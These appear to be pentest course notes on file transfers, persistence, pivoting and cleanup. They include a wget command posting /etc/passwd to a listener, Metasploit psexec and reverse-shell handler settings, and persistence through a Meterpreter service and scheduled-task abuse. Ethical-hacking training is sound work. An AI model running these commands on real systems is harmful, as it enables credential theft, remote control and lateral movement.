Week 11: File Transfers, Pivoting, Reporting

File Transfers, Pivoting, Report Writing, and Career Advice

Maintaining Access / Pivoting / Cleanup - This lesson will discuss methods of maintaining access on a network, pivoting into other networks, and how to properly clean up as you exit a network.

The Legal Side of the House - This lesson will cover the important legal aspects that a pentester must know prior to conducting a penetration test. For example, having a rules of engagement document that specifies which networks can be attacked and what attack methods can be used. Knowing the common legal documents that a junior pentester may encounter will give them an advantage early in their career.

Report Writing - This lesson will cover the importance of report writing in penetration testing and walk through what should be included in a penetration test report. A demo penetration test report will be provided that will cover many of the findings that we have discussed in prior chapters. This will provide students with a clear understanding of what is expected on a penetration test report and how to write one effectively.

File Transfers

# Serve the current directory over HTTP (Python 2 / Python 3)
python -m SimpleHTTPServer 80
# OR
python3 -m http.server 80
python -m pyftpdlib -p 21 # FTP

wget http://<ip>:80/secrets.txt

## nc
nc -nvlp <port> > file # receiver: redirect into new file
nc <ip> <port> < file # sender
## wget, receiver has to clean the file
wget --post-file=/etc/passwd http://<ip>:<port> # sender; receiver listens with nc as above
tail -n +10 file > clean_file # delete transfer data (the HTTP request headers wget prepends; adjust the line count to match)


# Windows Defender can block this, though there are ways to split files to bypass
C:\Users\fcastle>certutil -urlcache -f http://<ip>/secrets.txt secrets.txt

C:\Users\fcastle>ftp <ip>
ftp> get <file>


msf5 > use windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts <ip>
msf5 exploit(windows/smb/psexec) > set smbdomain marvel
msf5 exploit(windows/smb/psexec) > set smbpass Password1
msf5 exploit(windows/smb/psexec) > set smbuser fcastle
msf5 exploit(windows/smb/psexec) > set target 2
msf5 exploit(windows/smb/psexec) > run
meterpreter > cd c:\\users
meterpreter > upload /root/files/secrets.txt c:\\secrets.txt
meterpreter > download c:\\secrets.txt secrets.txt

Maintaining Access

Persistence is dangerous and usually unnecessary for junior-to-mid-level pentesting (time-limited engagements, not red teaming). It opens a port on a machine with no credentials, leaving it wide open for a future attack. You'll have to go back in, delete the service, and remove it from the registry. The persistence script gives you an RC file that deletes the files for you, but it's generally dangerous and unnecessary.

Persistence Scripts

meterpreter > run persistence -h

If you want to get a meterpreter shell back:

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# might set lport to be a known port to be sneaky
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost <ip>

Scheduled Tasks

run scheduleme
run schtaskabuse


# Install meterpreter as a Windows service (metsvc); -A auto-starts a matching handler
run metsvc -A


Pivoting

Gained access to a machine on the 192 network that is dual-homed with the 10 network (you just need two NICs, i.e. two network adapters in VirtualBox).

# Check for other networks, besides ipconfig
route print
arp -a
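To make the `route print` output easier to read, here is an added Python helper (not part of the course material) that parses the IPv4 "Active Routes" table and flags a dual-homed host; the sample output and all addresses in it are constructed.

```python
import ipaddress

# Constructed sample of the IPv4 section of `route print` from a host with
# two NICs (hypothetical addresses, not taken from any real machine).
SAMPLE_ROUTE_PRINT = """\
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0    192.168.57.1   192.168.57.141     25
        10.10.10.0    255.255.255.0         On-link      10.10.10.20    281
       10.10.10.20  255.255.255.255         On-link      10.10.10.20    281
        127.0.0.0        255.0.0.0         On-link        127.0.0.1    331
     192.168.57.0    255.255.255.0         On-link   192.168.57.141    281
        224.0.0.0        240.0.0.0         On-link        127.0.0.1    331
===========================================================================
"""

def parse_routes(text):
    """Return the rows of the 'Active Routes' table as
    (destination, netmask, gateway, interface, metric) tuples."""
    rows, in_table = [], False
    for line in text.splitlines():
        if line.startswith("Network Destination"):
            in_table = True          # header row: data starts on the next line
            continue
        if in_table:
            if line.startswith("=") or line.startswith("Persistent"):
                break                # end of the active-routes table
            parts = line.split()
            if len(parts) == 5:
                rows.append(tuple(parts))
    return rows

def connected_networks(text):
    """Map each directly attached (On-link) subnet to the interface address
    that sits on it, skipping host routes, loopback and multicast entries."""
    nets = {}
    for dest, mask, gateway, iface, _metric in parse_routes(text):
        if gateway != "On-link":
            continue                 # reached via a gateway, not attached
        net = ipaddress.ip_network(f"{dest}/{mask}", strict=False)
        if net.prefixlen == 32 or net.is_loopback or net.is_multicast:
            continue
        nets[str(net)] = iface
    return nets

def is_dual_homed(text):
    """True when the host sits on two or more attached subnets (a pivot candidate)."""
    return len(set(connected_networks(text).values())) >= 2
```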

Scanning on a pivot is incredibly slow, but:

use auxiliary/scanner/portscan/tcp


Cleanup

The cleanup process covers what is required to clean up systems once the penetration test has been completed; it does not mean removing logs, etc. This includes all user accounts and binaries used during the test.

  • Remove all executables, scripts and temporary files from a compromised system. If possible, use a secure delete method for removing the files and folders.

  • Return system settings and application configuration parameters to their original values if they were modified during the assessment.

  • Remove all backdoors and/or rootkits installed.

  • Remove any user accounts created for connecting back to compromised systems.

Report Writing

Career Advice
